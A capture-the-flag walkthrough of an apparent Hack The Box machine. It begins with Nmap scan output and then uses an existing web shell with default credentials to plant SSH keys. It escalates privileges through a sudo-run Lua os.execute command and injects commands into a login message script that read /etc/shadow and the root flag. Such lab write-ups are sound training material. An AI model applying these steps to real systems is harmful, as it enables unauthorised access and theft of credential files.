Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-30 12:03 IST NSE: Loaded 151 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 12:03 Completed NSE at 12:03, 0.00s elapsed Initiating NSE at 12:03 Completed NSE at 12:03, 0.00s elapsed Initiating NSE at 12:03 Completed NSE at 12:03, 0.00s elapsed Initiating Ping Scan at 12:03 Scanning 10.10.10.181 [4 ports] Completed Ping Scan at 12:03, 0.44s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 12:03 Completed Parallel DNS resolution of 1 host. at 12:03, 0.57s elapsed Initiating SYN Stealth Scan at 12:03 Scanning 10.10.10.181 [1000 ports] Discovered open port 22/tcp on 10.10.10.181 Discovered open port 80/tcp on 10.10.10.181 Completed SYN Stealth Scan at 12:03, 3.45s elapsed (1000 total ports) Initiating Service scan at 12:03 Scanning 2 services on 10.10.10.181 Completed Service scan at 12:03, 6.88s elapsed (2 services on 1 host) Initiating OS detection (try #1) against 10.10.10.181 Retrying OS detection (try #2) against 10.10.10.181 Retrying OS detection (try #3) against 10.10.10.181 Retrying OS detection (try #4) against 10.10.10.181 Retrying OS detection (try #5) against 10.10.10.181 Initiating Traceroute at 12:03 Completed Traceroute at 12:03, 0.66s elapsed Initiating Parallel DNS resolution of 2 hosts. at 12:03 Completed Parallel DNS resolution of 2 hosts. at 12:03, 0.30s elapsed NSE: Script scanning 10.10.10.181. Initiating NSE at 12:03 Completed NSE at 12:04, 8.03s elapsed Initiating NSE at 12:04 Completed NSE at 12:04, 1.43s elapsed Initiating NSE at 12:04 Completed NSE at 12:04, 0.00s elapsed Nmap scan report for 10.10.10.181 Host is up (0.25s latency). Not shown: 998 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA) | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA) |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Help us No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.80%E=4%D=5/30%OT=22%CT=1%CU=38618%PV=Y%DS=2%DC=T%G=Y%TM=5ED1FE5 OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=A)OPS OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1 OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N% OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD OS:=S) Uptime guess: 0.580 days (since Fri May 29 22:08:32 2020) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 5900/tcp) HOP RTT ADDRESS 1 659.58 ms 10.10.14.1 2 659.59 ms 10.10.10.181 NSE: Script Post-scanning. Initiating NSE at 12:04 Completed NSE at 12:04, 0.00s elapsed Initiating NSE at 12:04 Completed NSE at 12:04, 0.00s elapsed Initiating NSE at 12:04 Completed NSE at 12:04, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 37.69 seconds Raw packets sent: 1141 (54.230KB) | Rcvd: 1103 (47.658KB)
WEB ENUMERATION PORT 80
Lets First check Webpage !!
Lets check its source code
Here We see That we Have something written in comments So lets Google that !!
After Testing bunch of this I got one of them working Smevk.php lets redirect our url with this php file
credentials are default admin and admin we can read them in php file
After Logging in I got webpage like this!!
After looking at this page we can read and write files in actual machine So Lets use our own ssh keys and copy them to Webadmin as we cannot use Sysadmin
So after copying files in /home/webadmin/.ssh/authorized_keys we can SSH into webadmin.
SSH WEBADMIN THEN SYSADMIN
As we can see we have access to sysadmin
After trying to get into sysadmin I failed!!
Its time to priv escalate our user
After searching over google I saw that i can access sysadmin using simple commands <br>So I used simple command to check if it works
echo “os.execute(‘/bin/bash/’)” > privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
Here We got Sysadmin’s User access!!!
GETTING ROOT ACCESS
Lets run pspy32 to check running proccess
we got a process which is unique!!
Lets google this !!
After google Lets see file permissions and users
root and sysadmin
It is updated every 30 seconds
Lets execute our command in 00-header as we can see output of this file in ssh login time as it is same as ssh login..
echo “cat /etc/shadow” > 00-header1
We have to login to webadmin SSH again in another terminal
Here we got our output!!
echo “cat /root/root.txt
Here we Go with our root flag!!
HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE